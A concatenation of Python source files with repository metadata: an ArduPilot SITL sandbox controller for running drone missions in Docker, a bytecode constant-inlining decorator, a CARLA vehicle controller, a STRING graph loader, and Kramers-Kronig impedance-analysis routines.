        bzc = self._bugzoo.containers

        # generate a temporary log file for the SITL
        self.__fn_log = bzc.mktemp(self.container)
        logger.debug("writing SITL output to: %s", self.__fn_log)

        name_bin = os.path.join("/opt/ardupilot/build/sitl/bin",  # FIXME
                                name_bin)
        speedup = self.configuration.speedup
        home = str(self.home)
        # assemble the SITL command line; stdout+stderr are redirected
        # into the temporary log file via the bash '>&' redirection
        cmd = '{} --model "{}" --speedup "{}" --home "{}" --defaults "{}"'
        cmd = cmd.format(name_bin, name_model, speedup, home, fn_param)
        cmd = '{} >& {}'.format(cmd, shlex.quote(self.__fn_log))

        # add SITL prefix
        cmd = '{} {}'.format(self.prefix, cmd)
        logger.debug("launching SITL via: %s", cmd)

        # FIXME add non-blocking execution to BugZoo client API
        # executed through bash so that sourcing the environment and the
        # '>&' redirection both work
        cmd = 'source /.environment && {}'.format(cmd)
        cmd = "/bin/bash -c {}".format(shlex.quote(cmd))
        logger.debug("wrapped command: %s", cmd)
        docker_client = docker.from_env()  # FIXME
        docker_api = docker_client.api
        resp = docker_api.exec_create(self.container.id,
                                      cmd,
                                      tty=True,
                                      stdout=True,
                                      stderr=True)
        # with stream=True, exec_start yields output chunks as they arrive
        output = docker_api.exec_start(resp['Id'], stream=verbose)
        logger.debug("started SITL")
        if verbose:
            for line in output:
                line = line.decode(sys.stdout.encoding).rstrip('\n')
                logger.getChild('SITL').debug(line)
        logger.debug("SITL finished")
    @detect_lost_connection
    def start(self,
              binary_name: str,
              model_name: str,
              param_file: str,
              verbose: bool = True
              ) -> None:
        """
        Launches the SITL inside this sandbox, and establishes a connection to
        the vehicle running inside the simulation. Blocks until SITL is
        launched and a connection is established.

        Raises:
            NoConnectionError: if a connection cannot be established.
            ConnectionLostError: if the connecton is lost before the vehicle
                is ready to receive commands.
            PostConnectionSetupFailed: if the post-connection setup phase
                failed.
            VehicleNotReadyError: if a timeout occurred before the vehicle was
                ready to accept commands.
        """
        stopwatch = Stopwatch()
        speedup = self.configuration.speedup
        # timeouts are scaled down by the simulation speedup, plus slack
        timeout_set_mode = (15 / speedup + 2) + 30
        timeout_3d_fix = (10 / speedup + 2) + 30
        timeout_state = (90 / speedup + 2) + 30
        timeout_mavlink = 60
        bzc = self._bugzoo.containers

        # run the SITL in a background daemon thread (it blocks until exit)
        args = (binary_name, model_name, param_file, verbose)
        self.__sitl_thread = threading.Thread(target=self._launch_sitl,
                                              args=args)
        self.__sitl_thread.daemon = True
        self.__sitl_thread.start()

        # establish connection
        protocol = 'tcp'
        port = 5760
        ip = str(bzc.ip_address(self.container))
        url = "{}:{}:{}".format(protocol, ip, port)
        logger.debug("connecting to SITL at %s", url)
        try:
            # self.update is registered as a hook so every incoming message
            # refreshes the sandbox state
            self.__connection = MAVLinkConnection(url,
                                                  {'update': self.update},
                                                  timeout=timeout_mavlink)
        except dronekit.APIException:
            raise NoConnectionError

        # wait for longitude and latitude to match their expected values, and
        # for the system to match the expected `armable` state.
        initial_lon = self.state_initial['longitude']
        initial_lat = self.state_initial['latitude']
        initial_armable = self.state_initial['armable']
        v = self.state_initial.__class__.variables

        # FIXME wait for 3D fix
        time.sleep(timeout_3d_fix)

        stopwatch.reset()
        stopwatch.start()
        while True:
            ready_lon = v['longitude'].eq(initial_lon, self.state['longitude'])
            ready_lat = v['latitude'].eq(initial_lat, self.state['latitude'])
            ready_armable = self.state['armable'] == initial_armable
            if ready_lon and ready_lat and ready_armable:
                break
            if stopwatch.duration > timeout_state:
                logger.error("latitude should be [%f] but was [%f]",
                             initial_lat, self.state['latitude'])
                logger.error("longitude should be [%f] but was [%f]",
                             initial_lon, self.state['longitude'])
                logger.error("armable should be [%s] but was [%s]",
                             initial_armable, self.state['armable'])
                raise VehicleNotReadyError
            time.sleep(0.05)

        # subclass hook; a False return aborts startup
        if not self._on_connected():
            raise PostConnectionSetupFailed

        # wait until the vehicle is in GUIDED mode
        guided_mode = dronekit.VehicleMode('GUIDED')
        self.vehicle.mode = guided_mode
        stopwatch.reset()
        stopwatch.start()
        while self.vehicle.mode != guided_mode:
            if stopwatch.duration > timeout_set_mode:
                logger.error('vehicle is not in guided mode')
                raise VehicleNotReadyError
            time.sleep(0.05)
    def stop(self) -> None:
        """
        Closes the MAVLink connection (if any), sends SIGINT to the SITL
        process inside the container, and joins the SITL thread.
        """
        logger.debug("Stopping SITL")
        bzc = self._bugzoo.containers
        if self.has_connection():
            self.connection.close()
        # list candidate SITL processes inside the container (pid + command);
        # the nested quoting escapes the awk program for the shell
        ps_cmd = 'ps aux | grep -i sitl | awk {\'"\'"\'print $2,$11\'"\'"\'}'
        out = bzc.command(self.container, ps_cmd)
        all_processes = out.output.splitlines()
        logger.debug("checking list of processes: %s", str(all_processes))
        for p in all_processes:
            if not p:
                continue
            pid, cmd = p.split(' ')
            # the SITL is recognised by its binary path, or by the sandbox
            # prefix command when one is configured
            is_sitl = cmd.startswith('/opt/ardupilot')
            if not is_sitl and self.prefix:
                is_sitl = cmd.startswith(self.prefix.split(' ')[0])
            logger.debug("cmd [%s]: %s", is_sitl, cmd)
            if is_sitl:
                # SIGINT (kill -2) lets the SITL shut down cleanly
                bzc.command(self.container, "kill -2 {}".format(pid))
                logger.debug("killed process: %s", pid)
                break
        logger.debug("Killed it")
        logger.debug("Joining thread")
        self.__sitl_thread.join()
        logger.debug("Joined")
        # cmd = 'ps aux | grep -i sitl | awk {\'"\'"\'print $2\'"\'"\'} | xargs kill -2' # noqa: pycodestyle
        # bzc.command(self.container, cmd, stdout=False, stderr=False)
def _on_connected(self) -> bool:
"""
Called immediately after a connection to the vehicle is established.
"""
return True
    @detect_lost_connection
    def run_and_trace(self,
                      commands: Sequence[Command],
                      collect_coverage: bool = False
                      ) -> 'MissionTrace':
        """
        Executes a mission, represented as a sequence of commands, and
        returns a description of the outcome.

        Parameters:
            commands: the list of commands to be sent to the robot as
                a mission.
            collect_coverage: indicates whether or not coverage information
                should be incorporated into the trace. If True (i.e., coverage
                collection is enabled), this function expects the sandbox to be
                properly instrumented.

        Returns:
            a trace describing the execution of a sequence of commands.
        """
        config = self.configuration
        env = self.environment  # NOTE(review): assigned but never used below
        speedup = config.speedup
        # timeouts scale with the simulation speedup, plus fixed slack
        timeout_command = 300 / speedup + 5
        timeout_arm = 10 / speedup + 5
        timeout_mission_upload = 20
        # the number of seconds for the delay added after DO commands
        do_delay = max(4, int(20 / speedup))
        # NOTE(review): `self.__lock` mangles to `_Sandbox__lock`, which is
        # never assigned in this class -- confirm the base class provides it
        # (ordinary mangling in BaseSandbox would yield `_BaseSandbox__lock`).
        with self.__lock:
            # NOTE(review): `outcomes` and `passed` are never used afterwards
            outcomes = []  # type: List[CommandOutcome]
            passed = True
            connection_lost = threading.Event()
            # FIXME The initial command should be based on initial state
            initial = dronekit.Command(0, 0, 0,
                                       0, 16, 0, 0,
                                       0.0, 0.0, 0.0, 0.0,
                                       -35.3632607, 149.1652351, 584)
            # delay to allow the robot to reach its stable state
            delay = dronekit.Command(0, 0, 0,
                                     3, 93, 0, 0,
                                     do_delay, -1, -1, -1,
                                     0, 0, 0)
            # converting from Houston commands to dronekit commands;
            # the mapping records which mission item belongs to which input
            # command (delay items map back to the preceding DO command)
            dronekitcmd_to_cmd_mapping = {}
            cmds = [initial]
            for i, cmd in enumerate(commands):
                dronekitcmd_to_cmd_mapping[len(cmds)] = i
                cmds.append(cmd.to_message().to_dronekit_command())
                # DO commands trigger some action and return.
                # we add a delay after them to see how they affect the state.
                if 'MAV_CMD_DO_' in cmd.__class__.uid:
                    dronekitcmd_to_cmd_mapping[len(cmds)] = i
                    cmds.append(delay)
            logger.debug("Final mission commands len: %d, mapping: %s",
                         len(cmds), dronekitcmd_to_cmd_mapping)

            # uploading the mission to the vehicle
            vcmds = self.vehicle.commands
            vcmds.clear()
            for cmd in cmds:
                vcmds.add(cmd)
            vcmds.upload(timeout=timeout_mission_upload)
            logger.debug("Mission uploaded")
            vcmds.wait_ready()

            # maps each wp to the final state and time when wp was reached
            wp_to_state = {}  # Dict[int, Tuple[State, float]]
            # [wp that has last been reached, wp running at the moment]
            last_wp = [0, 0]
            # used to synchronize rw to last_wp
            wp_lock = threading.Lock()
            # is set whenever a command in mission is done
            wp_event = threading.Event()

            # NOTE dronekit connection must not use its own heartbeat checking
            def heartbeat_listener(_, __, value):
                # value is the age of the last heartbeat, in seconds
                if value > TIME_LOST_CONNECTION:
                    connection_lost.set()
                    wp_event.set()
            self.vehicle.add_attribute_listener('last_heartbeat',
                                                heartbeat_listener)

            def check_for_reached(m):
                # MAVLink message hook: tracks mission progress in last_wp
                # and wakes the main loop via wp_event
                name = m.name
                message = m.message
                if name == 'MISSION_ITEM_REACHED':
                    logger.debug("**MISSION_ITEM_REACHED: %d", message.seq)
                    if message.seq == len(cmds) - 1:
                        logger.info("Last item reached")
                        with wp_lock:
                            last_wp[1] = int(message.seq) + 1
                            wp_event.set()
                elif name == 'MISSION_CURRENT':
                    logger.debug("**MISSION_CURRENT: %d", message.seq)
                    logger.debug("STATE: {}".format(self.state))
                    if message.seq > last_wp[1]:
                        with wp_lock:
                            if message.seq > last_wp[0]:
                                last_wp[1] = message.seq
                                logger.debug("SET EVENT")
                                wp_event.set()
                elif name == 'MISSION_ACK':
                    logger.debug("**MISSION_ACK: %s", message.type)
            self.connection.add_hooks({'check_for_reached': check_for_reached})

            # arm the vehicle, retrying until armed or timed out
            stopwatch = Stopwatch()
            stopwatch.start()
            self.vehicle.armed = True
            while not self.vehicle.armed:
                if stopwatch.duration >= timeout_arm:
                    raise VehicleNotReadyError
                logger.debug("waiting for the rover to be armed...")
                self.vehicle.armed = True
                time.sleep(0.1)

            # starting the mission
            self.vehicle.mode = dronekit.VehicleMode("AUTO")
            initial_state = self.state
            start_message = CommandLong(
                0, 0, 300, 0, 1, len(cmds) + 1, 0, 0, 0, 0, 4)
            self.connection.send(start_message)
            logger.debug("sent mission start message to vehicle")
            time_start = timer()
            wp_to_traces = {}
            # record states/messages per command until the mission completes,
            # a command times out, or the connection is lost
            with self.record() as recorder:
                while last_wp[0] <= len(cmds) - 1:
                    logger.debug("waiting for command")
                    not_reached_timeout = wp_event.wait(timeout_command)
                    logger.debug("Event set %s", last_wp)
                    if not not_reached_timeout:
                        logger.error("Timeout occured %d", last_wp[0])
                        break
                    if connection_lost.is_set():
                        logger.error("Connection to vehicle was lost.")
                        raise ConnectionLostError
                    with wp_lock:
                        # self.observe()
                        logger.info("last_wp: %s len: %d",
                                    str(last_wp),
                                    len(cmds))
                        logger.debug("STATE: {}".format(self.state))
                        current_time = timer()
                        time_passed = current_time - time_start
                        time_start = current_time
                        states, messages = recorder.flush()
                        if last_wp[0] > 0:
                            # attribute the flushed states to the command
                            # that just finished
                            cmd_index = dronekitcmd_to_cmd_mapping[last_wp[0]]
                            wp_to_state[cmd_index] = (self.state, time_passed)
                            cmd = commands[cmd_index]
                            trace = CommandTrace(cmd, states)
                            wp_to_traces[cmd_index] = trace
                        last_wp[0] = last_wp[1]
                        wp_event.clear()

            self.connection.remove_hook('check_for_reached')
            logger.debug("Removed hook")
            coverage = None
            if collect_coverage:
                # if appropriate, store coverage files
                self.__flush_coverage()
                coverage = self.__get_coverage()
            # order the per-command traces by their original command index
            traces = [wp_to_traces[k] for k in sorted(wp_to_traces.keys())]
            return MissionTrace(tuple(traces), coverage)
def __get_coverage(self) -> "FileLineSet":
"""
Copies gcda files from /tmp/<directory> to /opt/ardupilot
(where the source code is) and collects coverage results.
"""
bzc = self._bugzoo.containers
coverage = bzc.extract_coverage(self.container)
return coverage
def __flush_coverage(self) -> None:
"""
Sends a SIGUSR1 signal to ardupilot processes running in the
container. They will flush gcov data into gcda files that
will be copied to /tmp/<directory> for later use.
"""
bzc = self._bugzoo.containers
ps_cmd = 'ps aux | grep -i sitl | awk {\'"\'"\'print $2,$11\'"\'"\'}'
out = bzc.command(self.container, ps_cmd)
all_processes = out.output.splitlines()
logger.debug("checking list of processes: %s", str(all_processes))
for p in all_processes:
if not p:
continue
pid, cmd = p.split(' ')
if cmd.startswith('/opt/ardupilot'):
bzc.command(self.container, "kill -10 {}".format(pid))
break
| 40.288618 | 113 | 0.542478 |
e6d320262753c6cf71fcab56f2cbaf7c614ca985 | 1,653 | py | Python | engine/lib/asm/const_patcher.py | alexcher-im/sgemu | e85c6834b1057a27ba5c41c357c0de2336a12e2e | [
"Zlib"
] | 5 | 2020-10-24T12:39:52.000Z | 2021-04-04T22:47:44.000Z | engine/lib/asm/const_patcher.py | alexcher-im/sgemu | e85c6834b1057a27ba5c41c357c0de2336a12e2e | [
"Zlib"
] | null | null | null | engine/lib/asm/const_patcher.py | alexcher-im/sgemu | e85c6834b1057a27ba5c41c357c0de2336a12e2e | [
"Zlib"
] | null | null | null | import platform
from opcode import opmap
import numpy as np
# Master switch: when True (and not forced), wrapping is skipped on PyPy,
# whose bytecode layout differs from CPython's (see _wrap).
SHOULD_DISABLE_ON_PYPY = True
# True when the running interpreter is PyPy.
_do_not_wrap = platform.python_implementation().lower() == 'pypy'
def wrap(inline=(), force=False):
    """Decorator factory: bake the globals named in *inline* into the
    decorated function as constants (see ``_wrap``).

    ``force=True`` applies the rewrite even when it would normally be
    disabled (e.g. on PyPy).
    """
    def decorator(func):
        return _wrap(func, inline, force)
    return decorator
def _wrap(src_func, inline, force):
    """Return a copy of *src_func* with inlined globals baked in as constants.

    Rewrites the function's bytecode so LOAD_GLOBAL instructions become
    LOAD_CONST instructions pointing at the objects supplied in *inline*
    (a mapping of global name -> object). Returns *src_func* unchanged on
    PyPy unless *force* is true, since this relies on CPython's bytecode.

    NOTE(review): the patch loop rewrites EVERY LOAD_GLOBAL, so any global
    the function uses that is not listed in *inline* raises KeyError on the
    const_ids lookup — callers apparently must inline all globals; confirm.
    NOTE(review): assumes 2-byte wordcode (CPython >= 3.6) and the pre-3.8
    CodeType constructor signature (no co_posonlyargcount); the rebuilt
    function also drops defaults and closure cells — presumably acceptable
    for the intended targets, but verify on newer interpreters.
    """
    if not force and _do_not_wrap and SHOULD_DISABLE_ON_PYPY:
        return src_func
    code = src_func.__code__
    # Obtain the CodeType / FunctionType classes without importing `types`.
    code_class = (lambda: 0).__code__.__class__
    function_class = (lambda: 0).__class__
    new_const = list(code.co_consts)
    new_code = bytearray(code.co_code)
    const_ids = {}
    # Append each inlined object to the constants tuple, remembering its index.
    for string, const in inline.items():
        if string in code.co_names:
            new_const.append(const)
            const_ids[string] = len(new_const) - 1
    # Walk the 2-byte wordcode (opcode, oparg) pairs and patch loads.
    for i in range(0, len(new_code), 2):
        if new_code[i] == opmap['LOAD_GLOBAL']:
            new_code[i] = opmap['LOAD_CONST']
            current_obj_name = code.co_names[new_code[i + 1]]
            new_code[i + 1] = const_ids[current_obj_name]
    new_code_obj = code_class(code.co_argcount, code.co_kwonlyargcount, code.co_nlocals, code.co_stacksize,
                              code.co_flags, bytes(new_code), tuple(new_const), code.co_names, code.co_varnames,
                              code.co_filename, code.co_name, code.co_firstlineno, code.co_lnotab, code.co_freevars,
                              code.co_cellvars)
    new_func_obj = function_class(new_code_obj, src_func.__globals__, src_func.__name__)
    return new_func_obj
if __name__ == '__main__':
    # Smoke test: inline the numpy module into test_func as a constant,
    # then call it to confirm the rewritten bytecode still runs.
    @wrap(inline={'np': np})
    def test_func():
        b = np.empty(4)
        return b

    print(test_func())
| 30.611111 | 116 | 0.649728 |
73481aad09797ef9b1311c961ca2d484d4d510d8 | 4,357 | py | Python | srunner/scenariomanager/actorcontrols/npc_vehicle_control.py | supavit-siriwan/scenario_runner | bf729630ae8adae7dafb0638289650e81b2a7561 | [
"MIT"
] | 3 | 2021-03-12T07:35:42.000Z | 2022-03-11T07:20:53.000Z | srunner/scenariomanager/actorcontrols/npc_vehicle_control.py | supavit-siriwan/scenario_runner | bf729630ae8adae7dafb0638289650e81b2a7561 | [
"MIT"
] | 1 | 2021-05-27T17:08:53.000Z | 2021-05-27T17:08:53.000Z | srunner/scenariomanager/actorcontrols/npc_vehicle_control.py | supavit-siriwan/scenario_runner | bf729630ae8adae7dafb0638289650e81b2a7561 | [
"MIT"
] | 3 | 2019-10-31T04:12:26.000Z | 2020-03-25T21:38:50.000Z | #!/usr/bin/env python
# Copyright (c) 2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""
This module provides an example control for vehicles
"""
import math
import carla
from agents.navigation.basic_agent import LocalPlanner
from agents.navigation.local_planner import RoadOption
from srunner.scenariomanager.carla_data_provider import CarlaDataProvider
from srunner.scenariomanager.actorcontrols.basic_control import BasicControl
class NpcVehicleControl(BasicControl):

    """
    Controller class for vehicles derived from BasicControl.

    The controller makes use of the LocalPlanner implemented in CARLA.

    Args:
        actor (carla.Actor): Vehicle actor that should be controlled.
    """

    # PID gains and step size handed to the LocalPlanner's lateral controller.
    _args = {'K_P': 1.0, 'K_D': 0.01, 'K_I': 0.0, 'dt': 0.05}

    def __init__(self, actor, args=None):
        super(NpcVehicleControl, self).__init__(actor)

        # LocalPlanner expects km/h while _target_speed is in m/s, hence * 3.6.
        self._local_planner = LocalPlanner(  # pylint: disable=undefined-variable
            self._actor, opt_dict={
                'target_speed': self._target_speed * 3.6,
                'lateral_control_dict': self._args})

        if self._waypoints:
            self._update_plan()

    def _update_plan(self):
        """
        Update the plan (waypoint list) of the LocalPlanner
        """
        plan = []
        for transform in self._waypoints:
            # Snap each waypoint transform onto the road network (any lane type).
            waypoint = CarlaDataProvider.get_map().get_waypoint(
                transform.location, project_to_road=True, lane_type=carla.LaneType.Any)
            plan.append((waypoint, RoadOption.LANEFOLLOW))
        self._local_planner.set_global_plan(plan)

    def _update_offset(self):
        """
        Propagate the current lateral offset to the LocalPlanner's
        lateral controller (no public setter exists, hence the reach
        into protected members).
        """
        self._local_planner._vehicle_controller._lat_controller._offset = self._offset  # pylint: disable=protected-access

    def reset(self):
        """
        Reset the controller
        """
        if self._actor and self._actor.is_alive:
            if self._local_planner:
                self._local_planner.reset_vehicle()
                self._local_planner = None
            self._actor = None

    def run_step(self):
        """
        Execute on tick of the controller's control loop

        Note: Negative target speeds are not yet supported.
              Try using simple_vehicle_control or vehicle_longitudinal_control.

        If _waypoints are provided, the vehicle moves towards the next waypoint
        with the given _target_speed, until reaching the final waypoint. Upon reaching
        the final waypoint, _reached_goal is set to True.

        If _waypoints is empty, the vehicle moves in its current direction with
        the given _target_speed.

        If _init_speed is True, the control command is post-processed to ensure that
        the initial actor velocity is maintained independent of physics.
        """
        self._reached_goal = False

        # Pick up waypoint/offset changes made since the last tick.
        if self._waypoints_updated:
            self._waypoints_updated = False
            self._update_plan()

        if self._offset_updated:
            self._offset_updated = False
            self._update_offset()

        target_speed = self._target_speed
        # If target speed is negative, raise an exception
        if target_speed < 0:
            raise NotImplementedError("Negative target speeds are not yet supported")

        # LocalPlanner works in km/h, _target_speed is m/s.
        self._local_planner.set_speed(target_speed * 3.6)
        control = self._local_planner.run_step(debug=False)

        # Check if the actor reached the end of the plan
        if self._local_planner.done():
            self._reached_goal = True

        self._actor.apply_control(control)

        if self._init_speed:
            # Planar speed only (z component ignored).
            current_speed = math.sqrt(self._actor.get_velocity().x**2 + self._actor.get_velocity().y**2)

            # If _init_speed is set, and the PID controller is not yet up to the point to take over,
            # we manually set the vehicle to drive with the correct velocity
            if abs(target_speed - current_speed) > 3:
                yaw = self._actor.get_transform().rotation.yaw * (math.pi / 180)
                vx = math.cos(yaw) * target_speed
                vy = math.sin(yaw) * target_speed
                self._actor.set_target_velocity(carla.Vector3D(vx, vy, 0))
7c5539778d429d4d4873a1a2fe69ced37de9aa3d | 3,499 | py | Python | bindings/python/ensmallen/datasets/string/halomonasboliviensislc1.py | AnacletoLAB/ensmallen_graph | b2c1b18fb1e5801712852bcc239f239e03076f09 | [
"MIT"
] | 5 | 2021-02-17T00:44:45.000Z | 2021-08-09T16:41:47.000Z | bindings/python/ensmallen/datasets/string/halomonasboliviensislc1.py | AnacletoLAB/ensmallen_graph | b2c1b18fb1e5801712852bcc239f239e03076f09 | [
"MIT"
] | 18 | 2021-01-07T16:47:39.000Z | 2021-08-12T21:51:32.000Z | bindings/python/ensmallen/datasets/string/halomonasboliviensislc1.py | AnacletoLAB/ensmallen | b2c1b18fb1e5801712852bcc239f239e03076f09 | [
"MIT"
] | 3 | 2021-01-14T02:20:59.000Z | 2021-08-04T19:09:52.000Z | """
This file offers the methods to automatically retrieve the graph Halomonas boliviensis LC1.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def HalomonasBoliviensisLc1(
    directed: bool = False,
    preprocess: bool = True,
    load_nodes: bool = True,
    verbose: int = 2,
    cache: bool = True,
    cache_path: str = "graphs/string",
    version: str = "links.v11.5",
    **additional_graph_kwargs: Dict
) -> Graph:
    """Retrieve and build the Halomonas boliviensis LC1 graph from STRING.

    Parameters
    -------------------
    directed: bool = False
        Load the graph as directed (True) or undirected (False, default).
    preprocess: bool = True
        Preprocess the graph for optimal loading time and memory.
    load_nodes: bool = True
        Load the node vocabulary; otherwise nodes are a plain numeric range.
    verbose: int = 2
        Whether to show loading bars during retrieval and building.
    cache: bool = True
        Download and preprocess each file only once.
    cache_path: str = "graphs"
        Directory where downloaded graphs are stored.
    version: str = "links.v11.5"
        Graph version to retrieve. Available versions:
        "homology.v11.5", "physical.links.v11.5", "links.v11.5".
    additional_graph_kwargs: Dict
        Extra keyword arguments forwarded to the graph constructor.

    Returns
    -----------------------
    Instance of the Halomonas boliviensis LC1 graph.

    References
    ---------------------
    Please cite: Szklarczyk et al., "STRING v11: protein--protein
    association networks with increased coverage, supporting functional
    discovery in genome-wide experimental datasets", Nucleic Acids
    Research 47(D1): D607--D613, 2019, Oxford University Press.
    """
    retriever = AutomaticallyRetrievedGraph(
        graph_name="HalomonasBoliviensisLc1",
        repository="string",
        version=version,
        directed=directed,
        preprocess=preprocess,
        load_nodes=load_nodes,
        verbose=verbose,
        cache=cache,
        cache_path=cache_path,
        additional_graph_kwargs=additional_graph_kwargs,
    )
    return retriever()
| 33.32381 | 223 | 0.679337 |
1c8bc3c563ff7fe132279764f884e0c635527460 | 4,436 | py | Python | KKlib.py | msb002/imped2drt | 37247b8e29bc88b053bde8cf9b0981c3cf5c99cc | [
"MIT"
] | 3 | 2020-05-27T04:16:34.000Z | 2021-05-24T00:01:06.000Z | KKlib.py | msb002/imped2drt | 37247b8e29bc88b053bde8cf9b0981c3cf5c99cc | [
"MIT"
] | null | null | null | KKlib.py | msb002/imped2drt | 37247b8e29bc88b053bde8cf9b0981c3cf5c99cc | [
"MIT"
] | 3 | 2020-02-03T18:16:18.000Z | 2020-06-23T11:31:17.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 24 16:36:57 2018
Last Updated: Jan 17 2020
@author: NicoleCreange
Based on work by Yoed Tsur
"""
#%%
import numpy as np
import matplotlib.pyplot as plt
# Silence divide-by-zero / invalid-value warnings module-wide (presumably
# precautionary for the elementwise ratios in the KK routines — the singular
# diagonal terms are special-cased before any 0/0 is evaluated; confirm).
np.seterr(divide='ignore', invalid='ignore')
def KKT_i2r(ww, z):
    """Kramers-Kronig transform: imaginary part -> real part.

    Reconstructs the real part of the impedance from its imaginary part by
    evaluating the KK integral with a trapezoidal rule. The singular point
    w' == w of the integrand is replaced by its analytic (L'Hopital) limit,
    using a centred difference in the interior and one-sided differences at
    the endpoints.

    Parameters
    ----------
    ww : array_like
        Frequencies in Hz, ordered low to high (converted to angular
        frequency internally; the caller's array is not modified).
    z : sequence of complex
        Impedance samples matching ``ww``.

    Returns
    -------
    list
        Reconstructed real part at each frequency, offset so the
        highest-frequency point matches ``z[-1].real``.
    """
    l = len(z)
    KKTr = []
    # np.asarray makes list input safe too: a bare ``ww * 2`` would
    # *repeat* a Python list instead of scaling it.
    ww = np.asarray(ww) * 2 * np.pi
    for ii in range(l):
        integrand = []
        for jj in range(l):
            if jj != ii:
                x = (ww[jj]*z[jj].imag - ww[ii]*z[ii].imag)/(ww[jj]**2 - ww[ii]**2)
            if jj == ii and jj != 0 and jj != l-1:
                # Diagonal limit, centred difference for d(Z'')/dw.
                x = 0.5*((z[jj].imag/ww[jj]) + ((z[jj+1].imag - z[jj-1].imag)/(ww[jj+1] - ww[jj-1])))
            if jj == ii and jj == 0 and jj != l-1:
                # First point: forward difference.
                x = 0.5*(z[jj].imag/ww[jj] + ((z[jj+1].imag-z[jj].imag)/(ww[jj+1]-ww[jj])))
            if jj == ii and jj != 0 and jj == l-1:
                # Last point: backward difference.
                x = 0.5*((z[jj].imag/ww[jj]) + ((z[jj].imag-z[jj-1].imag)/(ww[jj]-ww[jj-1])))
            integrand.append(x)
        # Trapezoidal integration, vectorised. (The original additionally
        # built an unused scipy CubicSpline per row; that dead work — and
        # its per-iteration import — has been removed.)
        kk = np.asarray(integrand)
        rekk = np.sum(0.5 * (kk[1:] + kk[:-1]) * (ww[1:] - ww[:-1]))
        KKTr.append((2/np.pi)*rekk + z[-1].real)
    return KKTr
def KKT_r2i(ww, z):
    """Kramers-Kronig transform: real part -> imaginary part.

    Mirror of ``KKT_i2r``: rebuilds the imaginary part of the impedance
    from its real part via trapezoidal integration of the KK kernel, with
    finite-difference limits on the singular diagonal (centred in the
    interior, one-sided at the endpoints).

    Parameters
    ----------
    ww : array_like
        Frequencies in Hz, ordered low to high (converted to angular
        frequency internally; the caller's array is not modified).
    z : sequence of complex
        Impedance samples matching ``ww``.

    Returns
    -------
    list
        Reconstructed imaginary part at each frequency.
    """
    l = len(z)
    # np.asarray makes list input safe (see KKT_i2r).
    ww = np.asarray(ww) * 2 * np.pi
    KKTi = []
    for ii in range(l):
        integrand = []
        for jj in range(l):
            if jj != ii:
                x = (z[jj].real - z[ii].real)/(ww[jj]**2 - ww[ii]**2)
            if jj == ii and jj != 0 and jj != l-1:
                x = ((z[jj+1].real - z[jj-1].real)/(ww[jj+1] - ww[jj-1]))/(2*ww[jj])
            if jj == ii and jj == 0 and jj != l-1:
                x = ((z[jj+1].real - z[jj].real)/(ww[jj+1]-ww[jj]))/(2*ww[jj])
            if jj == ii and jj != 0 and jj == l-1:
                x = ((z[jj].real - z[jj-1].real)/(ww[jj]-ww[jj-1]))/(2*ww[jj])
            integrand.append(x)
        # Trapezoidal integration, vectorised; the original's unused
        # CubicSpline construction (dead code) has been removed.
        kk = np.asarray(integrand)
        imkk = np.sum(0.5 * (kk[1:] + kk[:-1]) * (ww[1:] - ww[:-1]))
        KKTi.append((2*ww[ii]/np.pi)*imkk)
    return KKTi
#%%
def KKT(w, Z, thres=0.2, clean=False):
    """Run a Kramers-Kronig consistency check on impedance data and plot it.

    Parameters
    ----------
    w : numpy.ndarray
        Frequencies in Hz. Flipped automatically when supplied
        high-to-low, since the transforms need low-to-high ordering.
    Z : numpy.ndarray
        Complex impedance samples matching ``w``.
    thres : float
        Relative residual threshold passed to ``KKT_clean``.
    clean : bool
        When True, points violating the KK relations beyond ``thres``
        are removed and the cleaned data returned.

    Returns
    -------
    (fig, axs, w, Z)
        Matplotlib figure and 2x2 axes (only axs[0, 1] is populated),
        plus the (possibly cleaned) frequency and impedance arrays.

    Changes vs. the original: a leftover debug ``print(order)`` and a
    redundant function-local ``import matplotlib.pyplot`` (already imported
    at module level) were removed.
    """
    # check for order of data. Needs to be low frequency to high frequency
    order = w[0] - w[-1]
    if order > 0:
        w = np.flipud(w)
        Z = np.flipud(Z)
    zr = Z.real
    zi = Z.imag
    # Sign convention: work with the conjugate Z' - jZ''.
    z = zr - 1j*zi
    KKTimag = KKT_r2i(w, z)
    KKTreal = KKT_i2r(w, z)
    KKw = w
    fig, axs = plt.subplots(nrows=2, ncols=2, figsize=(8, 5))
    if clean == True:
        KKTdata = np.asarray(KKTreal) + 1j*np.asarray(KKTimag)
        wc, Zdata = KKT_clean(w, Z, KKTdata, thres)
        # Cleaned data as dots, original data as dotted lines, KK fit solid.
        axs[0, 1].semilogx(wc, Zdata.real, 'b.', label="$Z_{exp}$'")
        axs[0, 1].semilogx(wc, -Zdata.imag, 'k.', label='$Z_{exp}$"')
        axs[0, 1].semilogx(w, Z.real, 'b:')
        axs[0, 1].semilogx(w, -Z.imag, 'k:')
        axs[0, 1].semilogx(KKw, np.asarray(KKTreal), 'g', label='KKT real')
        axs[0, 1].semilogx(KKw, -np.asarray(KKTimag), 'r', label='KKT imag')
        axs[0, 1].ticklabel_format(style='sci', axis='y', scilimits=(0, 0))
        axs[0, 1].set_xlabel('Frequency (Hz)')
        axs[0, 1].set_ylabel('|Z|')
        axs[0, 1].legend(fontsize=8)
        return fig, axs, wc, Zdata
    else:
        axs[0, 1].semilogx(w, Z.real, 'b.', label="$Z_{exp}$'")
        axs[0, 1].semilogx(w, -Z.imag, 'k.', label='$Z_{exp}$"')
        axs[0, 1].semilogx(KKw, np.asarray(KKTreal), 'g', label='KKT real')
        axs[0, 1].semilogx(KKw, -np.asarray(KKTimag), 'r', label='KKT imag')
        axs[0, 1].ticklabel_format(style='sci', axis='y', scilimits=(0, 0))
        axs[0, 1].set_xlabel('Frequency (Hz)')
